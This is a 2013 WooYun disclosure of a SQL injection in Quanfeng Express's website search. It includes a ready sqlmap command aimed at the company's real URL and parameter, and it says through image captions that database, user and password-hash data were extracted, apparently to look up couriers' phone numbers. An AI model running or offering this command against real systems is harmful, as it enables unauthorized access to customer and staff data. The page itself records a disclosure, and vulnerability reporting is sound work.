当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040054

漏洞标题:全峰快递主站sql注入漏洞一枚

相关厂商:全峰快递

漏洞作者: newbie0086

提交时间:2013-10-17 17:32

修复时间:2013-12-01 17:33

公开时间:2013-12-01 17:33

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

淘宝说快递快到了,快递是全峰,半天还没送过来,想看看快递员的电话,
is dba? true,快递数据是个好东西,他好我也好

详细说明:

点击服务网店选项,进行搜索,得到搜索型注射点,参数keywords这

web2.png

漏洞证明:

注射点:

sqlmap -u "http://www.qfkd.com.cn/city.aspx?wang=200&city=662&type=手机&keywords=wooyun"  --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --is-dba


dba.png


database:

database.png


user:

pass.png


other:

hash.png


修复方案:

云南白药疮口贴

版权声明:转载请注明来源 newbie0086@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝